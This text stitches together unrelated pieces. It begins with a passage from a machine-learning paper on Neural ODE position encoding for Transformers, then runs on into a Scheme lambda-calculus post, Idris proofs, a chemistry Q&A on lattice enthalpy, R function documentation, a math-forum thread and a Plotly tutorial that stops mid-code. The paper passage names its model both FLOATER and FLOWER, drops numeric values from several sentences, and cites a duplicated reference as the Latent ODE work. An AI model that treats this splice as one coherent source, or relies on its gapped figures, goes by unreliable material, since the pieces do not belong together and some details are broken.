It is not surprising that during training, our flow-based method adds non-negligible time and memory overhead; this is because solving the Neural ODE precisely involves multiple forward and backward propagations of the flow model. Even though we deliberately designed a small flow model (consisting of only two feed-forward layers and one nonlinearity), stacking these together still increases training time substantially. To make it possible to train big models, we use the following optimizations:

• Initialize with pretrained models that do not contain flow-based dynamics, as discussed in Section 3.3.
• From (8), we know that if $h$ is close to zero, the position information diminishes (derived in the appendix), and our model degenerates to the original Transformer. Inspired by this property, we can initialize FLOATER with small weights. Combined with the previous trick, we obtain an informed initialization that incurs lower training loss at the beginning.
• We observed that the weights of $h$ are more stable and easier to train. Thus, we can separate the weights of $h$ from the remaining parts of the Transformer model. Concretely, we can 1) cache the positional bias vectors for some iterations without re-computing them, 2) update the weights of the flow model less frequently than the other parts of the Transformer, and 3) update the flow model with a larger learning rate to accelerate convergence.
• For the RoBERTa model, we adopt an even simpler strategy: we first download a pretrained RoBERTa model, plug in the flow-based encoding layers, and re-train the encoding layers on the WikiText-103 dataset for one epoch. When finetuning on the GLUE datasets, we can then choose to freeze the encoding layers.

Combining these tricks, we successfully train our proposed models with only a modest overhead compared to traditional models, and with virtually no overhead when finetuning the RoBERTa model on the GLUE benchmarks. Moreover, there is no overhead during the inference stage if we store the pre-calculated positional bias vectors in the checkpoints.

## 5 Conclusions

In this paper, we have shown that learning position encoding with a dynamical model can be an advantageous approach to improving Transformer models. Our proposed position encoding approach is inductive, data-driven, and parameter efficient. We have also demonstrated the superiority of our proposed model over existing position encoding approaches on various natural language processing tasks, including neural machine translation, language understanding, and question answering.

## References

• [1] T. Q. Chen, Y. Rubanova, J. Bettencourt, and D. K. Duvenaud (2018) Neural ordinary differential equations. In Advances in Neural Information Processing Systems, pp. 6571–6583. Cited by: Appendix A, §1, §3.1.
• [2] T. Q. Chen, Y. Rubanova, J. Bettencourt, and D. K. Duvenaud (2018) Neural ordinary differential equations. In Advances in Neural Information Processing Systems 31, S. Bengio, H. Wallach, H. Larochelle, K. Grauman, N. Cesa-Bianchi, and R. Garnett (Eds.), pp. 6571–6583. Cited by: 2nd item.
• [3] M. Dehghani, S. Gouws, O. Vinyals, J. Uszkoreit, and Ł. Kaiser (2018) Universal transformers. arXiv preprint arXiv:1807.03819. Cited by: §1, §2.2, §3.2, 2nd item.
• [4] J. Devlin, M. Chang, K. Lee, and K. Toutanova (2018) BERT: pre-training of deep bidirectional transformers for language understanding. arXiv preprint arXiv:1810.04805.
Cited by: Table 1, §1, §1, §2.2, §3.3, 3rd item. • [5] W. Grathwohl, R. T. Chen, J. Betterncourt, I. Sutskever, and D. Duvenaud (2018) Ffjord: free-form continuous dynamics for scalable reversible generative models. arXiv preprint arXiv:1810.01367. Cited by: §1. • [6] G. Lai, Q. Xie, H. Liu, Y. Yang, and E. Hovy (2017) RACE: large-scale reading comprehension dataset from examinations. arXiv preprint arXiv:1704.04683. Cited by: §4.2, Table 4. • [7] Z. Lan, M. Chen, S. Goodman, K. Gimpel, P. Sharma, and R. Soricut (2019) Albert: a lite bert for self-supervised learning of language representations . arXiv preprint arXiv:1909.11942. Cited by: §1, §1, §2.2, §3.2. • [8] Y. Liu and M. Lapata (2019) Hierarchical transformers for multi-document summarization . arXiv preprint arXiv:1905.13164. Cited by: 1st item. • [9] Y. Liu, M. Ott, N. Goyal, J. Du, M. Joshi, D. Chen, O. Levy, M. Lewis, L. Zettlemoyer, and V. Stoyanov (2019) RoBERTa: a robustly optimized bert pretraining approach. arXiv preprint arXiv:1907.11692. Cited by: §1, §2.2, 3rd item. • [10] S. Merity, C. Xiong, J. Bradbury, and R. Socher (2016) Pointer sentinel mixture models. arXiv preprint arXiv:1609.07843. Cited by: §B.3. • [11] M. Ott, S. Edunov, A. Baevski, A. Fan, S. Gross, N. Ng, D. Grangier, and M. Auli (2019) Fairseq: a fast, extensible toolkit for sequence modeling. arXiv preprint arXiv:1904.01038. Cited by: §B.2, §4. • [12] M. Ott, S. Edunov, D. Grangier, and M. Auli (2018) Scaling neural machine translation. arXiv preprint arXiv:1806.00187. Cited by: §B.2. • [13] W. H. Press, S. A. Teukolsky, W. T. Vetterling, and B. P. Flannery (1992) Numerical recipes in c++. The art of scientific computing 2, pp. 1002. Cited by: §B.1. • [14] A. Radford, J. Wu, R. Child, D. Luan, D. Amodei, and I. Sutskever (2019) Language models are unsupervised multitask learners. Cited by: §1. • [15] C. Raffel, N. Shazeer, A. Roberts, K. Lee, S. Narang, M. Matena, Y. Zhou, W. Li, and P. J. 
Liu (2019) Exploring the limits of transfer learning with a unified text-to-text transformer . arXiv preprint arXiv:1910.10683. Cited by: §1. • [16] P. Rajpurkar, R. Jia, and P. Liang (2018) Know what you don’t know: unanswerable questions for squad. arXiv preprint arXiv:1806.03822. Cited by: §4.2. • [17] P. Rajpurkar, J. Zhang, K. Lopyrev, and P. Liang (2016) SQuAD: 100,000+ questions for machine comprehension of text. arXiv preprint arXiv:1606.05250. Cited by: §4.2, §4.2. • [18] P. Shaw, J. Uszkoreit, and A. Vaswani (2018) Self-attention with relative position representations. In Proceedings of the 2018 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 2 (Short Papers), pp. 464–468. Cited by: Table 1, §1. • [19] M. Tenenbaum and H. Pollard (1985) Ordinary differential equations: an elementary textbook for students of mathematics, engineering, and the sciences. Dover Books on Mathematics, Dover Publications. External Links: ISBN 9780486649405, LCCN lc85012983, Link Cited by: §3.1. • [20] A. Vaswani, N. Shazeer, N. Parmar, J. Uszkoreit, L. Jones, A. N. Gomez, Ł. Kaiser, and I. Polosukhin (2017) Attention is all you need. In Advances in Neural Information Processing Systems, pp. 5998–6008. Cited by: §B.2, Table 1, §1, §1, §2.2, §3, 2nd item, 3rd item, §4.1. • [21] A. Wang, A. Singh, J. Michael, F. Hill, O. Levy, and S. R. Bowman (2018) GLUE: a multi-task benchmark and analysis platform for natural language understanding. arXiv preprint arXiv:1804.07461. Cited by: §4.2. • [22] Z. Yang, Z. Dai, Y. Yang, J. Carbonell, R. Salakhutdinov, and Q. V. Le (2019) XLNet: generalized autoregressive pretraining for language understanding. arXiv preprint arXiv:1906.08237. Cited by: §1. • [23] C. Yun, S. Bhojanapalli, A. S. Rawat, S. J. Reddi, and S. Kumar (2019) Are transformers universal approximators of sequence-to-sequence functions?. arXiv preprint arXiv:1912.10077. Cited by: §1. • [24] X. Zhang, F. 
Wei, and M. Zhou (2019) HIBERT: document level pre-training of hierarchical bidirectional transformers for document summarization. CoRR abs/1905.06566. External Links: Link, 1905.06566 Cited by: 1st item. ## Appendix A Training a Neural ODE model in Transformer We discuss the details of training the dynamical model. Recall that in our FLOWER model, the function $h$ joins the computational graph implicitly by generating a sequence of position encoding vectors $p_1, \ldots, p_N$, conditioned on a freely initialized vector $p_0$. The generation steps are computed iteratively as follows (suppose we choose the interval between two consecutive tokens to be $\Delta$): $p_1 = p_0 + \int_0^{\Delta} h(\tau, p_\tau; w_h)\,\mathrm{d}\tau$, (15) $p_2 = p_1 + \int_{\Delta}^{2\Delta} h(\tau, p_\tau; w_h)\,\mathrm{d}\tau$, \ldots, $p_N = p_{N-1} + \int_{(N-1)\Delta}^{N\Delta} h(\tau, p_\tau; w_h)\,\mathrm{d}\tau$. Finally, the loss of this sequence is going to be a function of all position encoding results $p_1, \ldots, p_N$, which is in turn a function of the model parameters $w_h$. The question is how to calculate the gradient through backpropagation. This question is fully solved in the Neural ODE method [1] with an efficient adjoint ODE solver. To illustrate the principle, we draw a diagram showing the forward and backward propagation in Figure 4. From [1], we know that the gradients can be computed by $\frac{\mathrm{d}L}{\mathrm{d}w_h} = -\int_t^s a(\tau)^\top \frac{\partial h(\tau, p_\tau; w_h)}{\partial w_h}\,\mathrm{d}\tau$, (16) where $a(\tau)$ is called the “adjoint state” of the ODE, which can be computed by solving another ODE $\frac{\mathrm{d}a(\tau)}{\mathrm{d}\tau} = -a(\tau)^\top \frac{\partial h(\tau, p_\tau; w_h)}{\partial p_\tau}$. (17) Note that the computation of (17) only involves a Jacobian-vector product, so it can be efficiently calculated by automatic differentiation. ## Appendix B Implementation details ### B.1 Settings of ODE solver To set up the ODE solver, we first need to choose the numerical algorithm [13]. We have different setups for different datasets. For neural machine translation problems (WMT14 En-De and En-Fr), we use the more accurate Runge-Kutta scheme with discretization step to solve the adjoint equation (recall that we set the interval of two neighboring tokens to be $\Delta$ globally).
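To make the iterative generation in (15) concrete, here is a small fixed-step sketch in Python (the function names, the scalar state, and the toy dynamics are illustrative assumptions, not the paper's code):

```python
import math

def midpoint_step(h, tau, p, dt):
    # One midpoint-rule step for dp/dtau = h(tau, p)
    k = h(tau, p)
    return p + dt * h(tau + dt / 2, p + (dt / 2) * k)

def positions(h, p0, n_tokens, delta=1.0, substeps=4):
    # Generate p_1 ... p_N by integrating h over consecutive
    # intervals of width delta, starting from the free vector p_0
    ps, p, tau = [], p0, 0.0
    dt = delta / substeps
    for _ in range(n_tokens):
        for _ in range(substeps):
            p = midpoint_step(h, tau, p, dt)
            tau += dt
        ps.append(p)
    return ps

# Toy scalar dynamics dp/dtau = -p, so p_k should approximate exp(-k)
ps = positions(lambda tau, p: -p, 1.0, n_tokens=3)
```

The choice of integration scheme and step size here plays the same role as the solver settings discussed in this appendix.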
While for datasets with long sentences, such as the GLUE and RACE benchmarks, we found that solving the adjoint equation with a high-order scheme is too slow; in that case we adopt the simple midpoint method with discretization step, and the gradients are calculated by automatic differentiation rather than the adjoint method. A third-party implementation of the ODE solver can be found at https://github.com/rtqichen/torchdiffeq. ### B.2 Training neural machine translation tasks We run the same preprocessing script provided by fairseq [11], which is also used in ScalingNMT [12]. With the standard training script, we first successfully reproduce all the results in the Transformer paper [20]. Based on that, we execute the following protocol to get our results: 1. Train the original Transformer model for 30 epochs. 2. Randomly initialize a FLOWER model with the same shape configuration. 3. Copy tensors from the best-performing checkpoint (on the validation set) to initialize the FLOWER model. Initialize the weights in the dynamical model with small values. 4. Halve the peak learning rate (e.g. in Transformer-base + En-De, the peak learning rate is changed from to ). 5. With the warm-initialized FLOWER checkpoint, retrain on the same dataset for 10 epochs (En-De) or 1 epoch (En-Fr). 6. Average the last 5 checkpoints and compute the BLEU score on the test split. ### B.3 Training language understanding tasks For the GLUE/SQuAD/RACE benchmarks, our experiments are all conducted on RoBERTa, for which both base and large configurations are available. Due to resource constraints (and to show compatibility with existing models), we initialize our FLOWER model with pretrained RoBERTa weights, similar to the NMT task. However, the weights of the dynamical function are not trained on a large corpus; given that the GLUE/SQuAD/RACE datasets are too small to train the dynamics from scratch, we decided to pretrain it alone on the WikiText-103 [10] data using the masked language modeling loss. We have found that training it alone only takes a few hours (2x Titan V100) and one epoch to converge.
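Step 6 of the training protocol above, checkpoint averaging, amounts to a parameter-wise mean. A minimal sketch with plain dicts standing in for checkpoints (names assumed; fairseq ships its own averaging script):

```python
def average_checkpoints(checkpoints):
    # Parameter-wise mean over a list of {name: value} state dicts
    n = len(checkpoints)
    return {name: sum(ckpt[name] for ckpt in checkpoints) / n
            for name in checkpoints[0]}

ckpts = [{"w": 1.0, "b": 0.0}, {"w": 3.0, "b": 2.0}]
avg = average_checkpoints(ckpts)  # {"w": 2.0, "b": 1.0}
```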
Once we have the pretrained FLOWER model, we can run the following downstream tasks and compare with RoBERTa under the same settings: #### GLUE benchmark consists of eight datasets, each with different hyperparameter settings. For hyperparameters such as learning rate, batch size, training iterations, warm-up iterations, etc., we use the same values recommended by the official repository of RoBERTa. #### SQuAD benchmark. For this benchmark we wrote our own finetuning code because currently there is no official code available. During the implementation process, we mainly referred to third-party repositories. We were not able to exactly match the official result reported in the RoBERTa paper, but came quite close ( difference in F1). For our FLOWER model, we use the same hyperparameters as RoBERTa. #### RACE benchmark. This benchmark has the longest context and sequence length. We follow the official training script and reproduce the result. Similar to the other benchmarks, we then repeat the training process using exactly the same training hyperparameters to make a fair comparison. In this benchmark we freeze the weights of the dynamical model and only finetune the weights of RoBERTa. ## Appendix C Cases suitable for non-equidistant discretization Although our model allows continuous values of and in (8), limiting the scope to text modeling tasks, positions are discrete values as . Once the continuous version of the position representation is obtained, we simply take the discretized values as the actual values to feed into the Transformer model, where is a hyperparameter (e.g. ). By choosing positions equidistantly, we are implicitly assuming the position signal evolves steadily as we go through each token in a sentence. More generally, the dynamics in (8) can deal with the case in which positions are not integers but an arbitrary monotone increasing series, which may not be equidistant. Below, we exemplify this general situation with several widely deployed tasks; we regard this as an interesting future direction.
This makes our model particularly suitable for the following scenarios, which traditional position representations may not handle well: • Hierarchical Transformer model [8, 24]. The model is a direct extension of the hierarchical RNN and is often used in long-document processing. It works by first running a word-level Transformer model on each sentence to extract the sentence embedding, and then applying a sentence-level Transformer scanning through each sentence embedding sequentially. We argue that when processing at the sentence level, it could be better to set the increment of the position index proportional to the length of the -th sentence. This is because longer sentences tend to carry more information, so is likely to move farther from . • Transformer for time-series events. As measurement time is continuous, time-series data is another scenario where a continuous position makes more sense than a discrete counterpart. More importantly, to predict future values by modeling historical values observed at irregular time grids, it is better to consider the length of the time horizon between two consecutive measurements. A successful previous work is the Latent ODE [2], except that they use an RNN as the backbone, and they model the hidden states rather than position representations with a Neural ODE (because the RNN itself provides positional bias). In this paper, we do not explore these more general cases. Instead, we leave them as interesting future work.
# Lambda calculus implementation in Scheme Lambda calculus is a formal system for representing computation. As with most formal systems and mathematics, it relies heavily on substitution. We will start by implementing a subst procedure that accepts an expression e, a source src and a destination dst, and replaces all occurrences of src with dst in e. (define (subst e src dst) (cond ((equal? e src) dst) ((pair? e) (cons (subst (car e) src dst) (subst (cdr e) src dst))) (else e))) Trying it a couple of times: > (subst '(lambda (x) x) 'x 'y) '(lambda (y) y) > (subst '(lambda (x) x) '(lambda (x) x) 'id) 'id Next, based on this substitution we need to implement a beta-reduce procedure that, for a lambda expression $(\lambda x . t) s$ will reduce to $t[x := s]$, that is, $t$ with all $x$ within $t$ replaced by $s$. Our procedure will consider 3 cases: 1. Lambda expression that accepts zero args – in which case we just return the body without any substitutions 2. Lambda expression that accepts a single argument – in which case we substitute every occurrence of that argument in the body with what’s passed to the expression and return the body 3. Lambda expression that accepts multiple arguments – in which case we substitute every occurrence of the first argument in the body with what’s passed to the expression and return a new lambda expression Before implementing the beta reducer, we will implement a predicate lambda-expr? that returns true if the expression is a lambda expression, and false otherwise: (define (lambda-expr? e) (and (pair? e) (equal? (car e) 'lambda))) Here’s the helper procedure which accepts a lambda expression e and a single argument x to pass to the expression:

(define (beta-reduce-helper e x)
  (cond ((and (lambda-expr? e) (> (length (cadr e)) 1))
         ; lambda expr that accepts multiple args
         (list 'lambda (cdr (cadr e)) (subst (caddr e) (car (cadr e)) x)))
        ((and (lambda-expr? e) (= (length (cadr e)) 1))
         ; lambda expr that accepts a single arg
         (subst (caddr e) (car (cadr e)) x))
        ((and (lambda-expr? e) (null? (cadr e)))
         ; lambda expr with zero args
         (caddr e))
        (else e)))

Then, our procedure beta-reduce will accept a variable number of arguments, and apply each one of them to beta-reduce-helper: (define (beta-reduce l . xs) (if (pair? xs) (apply beta-reduce (beta-reduce-helper l (car xs)) (cdr xs)) l)) Testing these with a few cases: > (beta-reduce '(lambda (x y) x) 123) '(lambda (y) 123) > (beta-reduce '(lambda (x y) y) 123) '(lambda (y) y) > (beta-reduce '(lambda (x) (lambda (y) x)) 123) '(lambda (y) 123) > (beta-reduce '(lambda (x) (lambda (y) y)) 123) '(lambda (y) y) However, note this case: > (beta-reduce '(lambda (n f x) (f (n f x))) '(lambda (f x) x)) '(lambda (f x) (f ((lambda (f x) x) f x))) It seems that we can further apply beta reductions to simplify that expression. For that, we will implement lambda-eval that will recursively evaluate lambda expressions to simplify them: (define (lambda-eval e) (cond ((can-beta-reduce? e) (lambda-eval (apply beta-reduce e))) ((pair? e) (cons (lambda-eval (car e)) (lambda-eval (cdr e)))) (else e))) But, what does it mean for an expression e to be beta reducible? The predicate is simply: (define (can-beta-reduce? e) (and (pair? e) (lambda-expr? (car e)) (pair? (cdr e)))) Great. Let's try a few examples now: > ; Church encoding: 1 = succ 0 > (lambda-eval '((lambda (n f x) (f (n f x))) (lambda (f x) x))) '(lambda (f x) (f x)) > ; Church encoding: 2 = succ 1 > (lambda-eval '((lambda (n f x) (f (n f x))) (lambda (f x) (f x)))) '(lambda (f x) (f (f x))) > ; Church encoding: 3 = succ 2 > (lambda-eval '((lambda (n f x) (f (n f x))) (lambda (f x) (f (f x))))) '(lambda (f x) (f (f (f x)))) There's our untyped lambda calculus 🙂 There are a couple of improvements that we could make, for example implement define within the system to define variables with values. Another neat addition would be to extend the system with a type checker. EDIT: As noted by a reddit user, the substitution procedure does not consider free/bound variables.
Here’s a gist that implements that as well. # Closed-form expression of a sum with proof in Idris One well-known fact is the sum $1 + 2 + \ldots + n = \frac {n(n + 1)} {2}$. Let’s try to prove this fact in Idris. We start intuitively by defining our recursive sum function: total sum : Nat -> Nat sum Z = Z sum (S n) = (S n) + sum n Testing it a few times: Idris> sum 3 6 : Nat Idris> sum 4 10 : Nat Looks good. Next, we will come up with our dependently typed function to prove the fact. theorem_1_firsttry : (n : Nat) -> sum n = divNat (n * (n + 1)) 2 theorem_1_firsttry Z = ?a theorem_1_firsttry (S n) = ?b The base case that we need to prove is of type 0 = divNat 0 2. Looks a bit tricky. Let’s try to use divNatNZ along with a proof that 2 is not zero: theorem_1_secondtry : (n : Nat) -> sum n = divNatNZ (n * (n + 1)) 2 (SIsNotZ {x = 1}) theorem_1_secondtry Z = ?a theorem_1_secondtry (S n) = ?b Now the base case is just Refl. Let’s put an inductive hypothesis as well: theorem_1_secondtry : (n : Nat) -> sum n = divNatNZ (n * (n + 1)) 2 (SIsNotZ {x = 1}) theorem_1_secondtry Z = Refl theorem_1_secondtry (S n) = let IH = theorem_1_secondtry n in ?b Idris tells us that we now need to prove: b : S (plus n (sum n)) = ifThenElse (lte (plus (plus n 1) (mult n (S (plus n 1)))) 0) (Delay 0) (Delay (S (Prelude.Nat.divNatNZ, div' (S (plus (plus n 1) (mult n (S (plus n 1))))) 1 SIsNotZ (plus (plus n 1) (mult n (S (plus n 1)))) (minus (plus (plus n 1) (mult n (S (plus n 1)))) 1) 1))) Woot. Let’s take a slightly different route by doing a few algebraic tricks to get rid of division. Instead of proving that $1 + 2 + \ldots + n = \frac {n(n + 1)} {2}$, we will prove $2 * (1 + 2 + \ldots + n) = n(n + 1)$. total theorem_1 : (n : Nat) -> 2 * sum n = n * (n + 1) -- sum n = n * (n + 1) / 2 theorem_1 Z = Refl theorem_1 (S n) = ?b Now we need to show that b : S (plus (plus n (sum n)) (S (plus (plus n (sum n)) 0))) = S (plus (plus n 1) (mult n (S (plus n 1)))).
total theorem_1 : (n : Nat) -> 2 * sum n = n * (n + 1) -- sum n = n * (n + 1) / 2 theorem_1 Z = Refl theorem_1 (S n) = let IH = theorem_1 n in rewrite (multRightSuccPlus n (plus n 1)) in rewrite sym IH in rewrite (plusZeroRightNeutral (sum n)) in rewrite (plusZeroRightNeutral (plus n (sum n))) in rewrite (plusAssociative n (sum n) (sum n)) in rewrite (sym (plusSuccRightSucc (plus n (sum n)) (plus n (sum n)))) in rewrite plusCommutative (plus n 1) (plus (plus n (sum n)) (sum n)) in rewrite sym (plusSuccRightSucc n Z) in rewrite plusZeroRightNeutral n in rewrite (sym (plusSuccRightSucc (plus (plus n (sum n)) (sum n)) n)) in rewrite (sym (plusAssociative (n + sum n) (sum n) n)) in rewrite plusCommutative (sum n) n in Refl Looks a bit big, but it works! With lines 4 and 5 we get rid of multiplication and then all we need to do is some algebraic re-ordering of plus to show that both sides are equivalent. Now that we proved it, you can use this fact in your favorite programming language 🙂 # Proving length of mapped and filtered lists in Idris First, let's start by implementing map' and filter' for lists: total map' : (a -> b) -> List a -> List b map' _ [] = [] map' f (x :: xs) = f x :: map' f xs total filter' : (a -> Bool) -> List a -> List a filter' p [] = [] filter' p (x::xs) with (p x) filter' p (x::xs) | True = x :: filter' p xs filter' p (x::xs) | False = filter' p xs Trying a few cases: Idris> map' (\x => x + 1) [1, 2] [2, 3] : List Integer Idris> filter' (\x => x /= 2) [1, 2] [1] : List Integer Looks neat. A valid question would be: What do we know about the length of a mapped and length of a filtered list? Intuition says that the length of a mapped list will be the same as the length of that list, since the values of the elements might change but not the actual length (size) of the original list.
Let’s prove this fact: -- For any given list xs, and any function f, the length of xs is same as the length of xs mapped with f total theorem_1 : (xs : List a) -> (f : a -> b) -> length xs = length (map' f xs) theorem_1 [] _ = Refl theorem_1 (x :: xs) f = let I_H = theorem_1 xs f in rewrite I_H in Refl Easy peasy, just use induction. Filtering is a bit trickier. The length of a filtered list can be less than or equal to the original list. The intuitive reasoning for this is as follows: 1. Maybe the filter will apply to some elements, in which case the length of the filtered list will be less than the length of the original list 2. Or, maybe the filter will not apply at all, in which case the length of the filtered list is the same as the length of the original list Let’s prove it! -- For any given list xs, and any filtering function f, the length of xs >= the length of xs filtered with f total theorem_2 : (xs : List a) -> (f : a -> Bool) -> LTE (length (filter' f xs)) (length xs) theorem_2 [] _ = LTEZero {right = 0} theorem_2 (x :: xs) f with (f x) theorem_2 (x :: xs) f | False = let I_H = theorem_2 xs f in let LTESuccR_I_H = lteSuccRight I_H in LTESuccR_I_H theorem_2 (x :: xs) f | True = let I_H = theorem_2 xs f in let LTESucc_I_H = LTESucc I_H in LTESucc_I_H I constructed this proof using holes. The base case was very simple, however, for the inductive step we needed to do something else. With the inductive step we consider two cases: 1. In the case the filter was applied (False), the I_H needs to match the target type LTE _ (S _) 2. In the case the filter was not applied (True), the I_H needs to match the target type LTE (S _) (S _) Idris has built-in proofs for these, with the following types: Idris> :t lteSuccRight lteSuccRight : LTE n m -> LTE n (S m) Idris> :t LTESucc LTESucc : LTE left right -> LTE (S left) (S right) So we just needed to use them to conclude the proof. 
Bonus: The only reason I rewrote filter' was to use with, which seems easier to rewrite when proving things about it. The built-in filter uses ifThenElse and I haven't found a way to rewrite goals that use it. I rewrote map' just for consistency. Bonus 2: Thanks to gallais@reddit for this hint. It seems that the same with (f x) used in the proof also makes the ifThenElse reduce.
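The facts proved above, together with the earlier closed-form sum, can also be spot-checked in an ordinary language. A quick Python sketch (an empirical check, of course, not a proof):

```python
# Closed form: 1 + 2 + ... + n = n * (n + 1) / 2
for n in range(100):
    assert sum(range(n + 1)) == n * (n + 1) // 2

# Mapping preserves length; filtering never increases it
xs = [3, 1, 4, 1, 5, 9, 2, 6]
mapped = [x + 1 for x in xs]
kept = [x for x in xs if x != 1]
assert len(mapped) == len(xs)
assert len(kept) <= len(xs)
```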
# Resolving ambiguity around Lattice Enthalpy in Born-Haber Cycle According to my textbook, Lattice enthalpy is the enthalpy change that occurs when one mole of a solid ionic compound is separated into gaseous ions under standard conditions.$$^1$$ According to the same textbook, this is an endothermic process, which makes sense as a lattice is generally held together by strong ionic bonds and thus would require energy to separate the atoms. The following diagram is given for the Born-Haber cycle in the textbook: The diagram supports the definition as the enthalpy of the individual gaseous atoms is greater than that of the lattice, i.e. the arrow moves up. However, as I was working through past papers by the International Baccalaureate, a question asked to draw the Born-Haber cycle for LiF.$$^2$$ This was the answer: In this case, the arrow is pointing down for the lattice enthalpy. To me, this does not suit the definition of lattice enthalpy as separating a lattice into its ions would require energy and not release energy. Hence, should the arrow not be pointing upwards for $$\ce{LiF_{(s)}}$$ to $$\ce{Li^+_{(g)} + F^-_{(g)}}$$? Am I making a fundamental error, is the case for NaCl different to LiF, or is the answer wrong? Works Cited: 1. Pearson Baccalaureate: Higher Level Chemistry 2nd Edition. By Catrin Brown and Mike Ford 2. International Baccalaureate • The downward pointing arrow means that energy is released when the crystalline solid is formed from the gas phase separated ions. So it is the negative of lattice enthalpy. The diagram is just a schematic showing the enthalpy balance in the B-H cycle. – Ed V Mar 16 at 22:53 • Ah, that makes sense, thank you. So, just to clarify, the arrow for the first image is for lattice enthalpy (endothermic) and therefore points upwards and the arrow for the second image is negative lattice enthalpy (exothermic) and therefore points downward? – Liam Mar 17 at 8:40 • Exactly correct!
– Ed V Mar 17 at 12:28 • Cheers for the help! :-) – Liam Mar 17 at 12:31
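To see the sign conventions in numbers, one can run Hess's law around a Born-Haber cycle. The figures below are approximate textbook values for NaCl in kJ/mol (my own assumptions, not taken from this thread):

```python
# Approximate textbook values for NaCl (kJ/mol)
dH_formation   = -411   # Na(s) + 1/2 Cl2(g) -> NaCl(s)
dH_sublimation = +107   # Na(s) -> Na(g)
dH_ionization  = +496   # Na(g) -> Na+(g) + e-
dH_half_bond   = +122   # 1/2 Cl2(g) -> Cl(g)
dH_e_affinity  = -349   # Cl(g) + e- -> Cl-(g)

# Hess's law: the formation route equals the gas-ion route
# minus the (endothermic) lattice separation step
lattice_enthalpy = (dH_sublimation + dH_ionization + dH_half_bond
                    + dH_e_affinity - dH_formation)
print(lattice_enthalpy)  # +787: energy absorbed separating NaCl(s) into gaseous ions
```

The positive value corresponds to the upward arrow; its negative is the downward arrow drawn when the lattice forms from gaseous ions.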
Validation on columns ## Usage validate_cols( data, predicate, ..., obligatory = FALSE, description = NA, skip_chain_opts = FALSE, success_fun = assertr::success_append, error_fun = assertr::error_append, defect_fun = assertr::defect_append ) ## Arguments - data: A data.frame or tibble to test - predicate: Predicate function or predicate generator such as in_set or within_n_sds - ...: Column selection that the predicate should be called on. All tidyselect language methods are supported - obligatory: If TRUE and the assertion fails, the data is marked as defective. For defective data, all the following rules are handled by the defect_fun function - description: A character string with a description of the assertion. The description is then displayed in the validation report - skip_chain_opts: While wrapping data with the validate function, the success_fun and error_fun parameters are rewritten with success_append and error_append respectively. In order to use the parameters assigned to the function directly, set skip_chain_opts to TRUE - success_fun: Function that is called when the validation passes - error_fun: Function that is called when the validation fails - defect_fun: Function that is called when the data is marked as defective
# Math Help - solve for x 1. ## solve for x Solve for x: x^4 + x^3 + x^2 + x + 1 = 0. 2. If you draw the graph of x^4 + x^3 + x^2 + x + 1, it won't cut the x-axis. So, x^4 + x^3 + x^2 + x + 1 = 0 has no real roots 3. Thanks songoku, I have an UGLY solution for this, but i am hoping THAT someone may be able to solve this elegantly. 4. If anyone's curious, the four complex roots are the following: x ≈ 0.309 + 0.951i x ≈ 0.309 - 0.951i x ≈ -0.809 + 0.588i x ≈ -0.809 - 0.588i (using a computer, of course ) Polar form: $x = \cos \frac{2\pi}{5} + i\sin \frac{2\pi}{5}$ $x = \cos \frac{8\pi}{5} + i\sin \frac{8\pi}{5}$ $x = \cos \frac{4\pi}{5} + i\sin \frac{4\pi}{5}$ $x = \cos \frac{6\pi}{5} + i\sin \frac{6\pi}{5}$ 01 5. Originally Posted by pacman Solve for x: x^4 + x^3 + x^2 + x + 1 = 0. Observe that $(x-1)(x^4+x^3+x^2+x+1)=x^5-1.$ Hence the solution you want is the set of the four complex 5th roots of unity. No need to plot graph or use computer. 6. Hint: divide BS x^2, we have x^2 + x + 1 + 1/x + 1/x^2 = 0, rearranging it and then grouping it (x + 1/x)^2 + (x + 1/x) + 1 = 0 It is now quadratic in x + 1/x, the result is quite ugly but it can generate a result . . . 7. Originally Posted by pacman Hint: divide BS x^2, we have x^2 + x + 1 + 1/x + 1/x^2 = 0, rearranging it and then grouping it (x + 1/x)^2 + (x + 1/x) + 1 = 0 It is now quadratic in x + 1/x, the result is quite ugly but it can generate a result . . . $x+\frac{1}{x}=\frac{-1\pm\sqrt{-3}}{2}$ Then $x=\frac{-\left(\frac{-1\pm\sqrt{-3}}{2}\right)\pm\sqrt{\left(\frac{-1\pm\sqrt{-3}}{2}\right)^2-4}}{2}$ Is this what you are saying? 8. I think there's a typo in pacman's last post. Instead of $\left(x + \frac{1}{x}\right)^2 + \left(x + \frac{1}{x}\right) + 1 = 0$ it should have been $\left(x + \frac{1}{x}\right)^2 + \left(x + \frac{1}{x}\right) {\color{red}-}\; 1 = 0$ 01 9. i mixed it up in a bowl of soup, yeongil is correct with his observation . . . .
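The roots listed in the thread can be verified numerically: they are the four non-real 5th roots of unity, as follows from the factorization $(x-1)(x^4+x^3+x^2+x+1)=x^5-1$. A quick Python check:

```python
import cmath

# x = exp(2*pi*i*k/5) for k = 1..4 are the non-real 5th roots of unity
roots = [cmath.exp(2j * cmath.pi * k / 5) for k in (1, 2, 3, 4)]

# Each should make x^4 + x^3 + x^2 + x + 1 vanish (up to float error)
residuals = [abs(x**4 + x**3 + x**2 + x + 1) for x in roots]
```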
# Facet and Trellis Plots in Python How to make Facet and Trellis Plots in Python with Plotly. New to Plotly? Plotly is a free and open-source graphing library for Python. We recommend you read our Getting Started guide for the latest installation or upgrade instructions, then move on to our Plotly Fundamentals tutorials or dive straight in to some Basic Charts tutorials. ### Facet and Trellis Plots Facet plots, also known as trellis plots or small multiples, are figures made up of multiple subplots which have the same set of axes, where each subplot shows a subset of the data. While it is straightforward to use plotly's subplot capabilities to make such figures, it's far easier to use the built-in facet_row and facet_col arguments in the various Plotly Express functions. Plotly Express is the easy-to-use, high-level interface to Plotly, which operates on a variety of types of data and produces easy-to-style figures. ### Scatter Plot Column Facets In [1]: import plotly.express as px df = px.data.tips() fig = px.scatter(df, x="total_bill", y="tip", color="smoker", facet_col="sex") fig.show() ### Bar Chart Row Facets In [2]: import plotly.express as px df = px.data.tips() fig = px.bar(df, x="size", y="total_bill", color="sex", facet_row="smoker") fig.show() ### Wrapping Column Facets When the facet dimension has a large number of unique values, it is possible to wrap columns using the facet_col_wrap argument.
```python
import plotly.express as px

df = px.data.gapminder()
fig = px.scatter(df, x='gdpPercap', y='lifeExp', color='continent', size='pop',
                 facet_col='year', facet_col_wrap=4)
fig.show()
```

### Histogram Facet Grids

```python
import plotly.express as px

df = px.data.tips()
fig = px.histogram(df, x="total_bill", y="tip", color="sex",
                   facet_row="time", facet_col="day",
                   category_orders={"day": ["Thur", "Fri", "Sat", "Sun"],
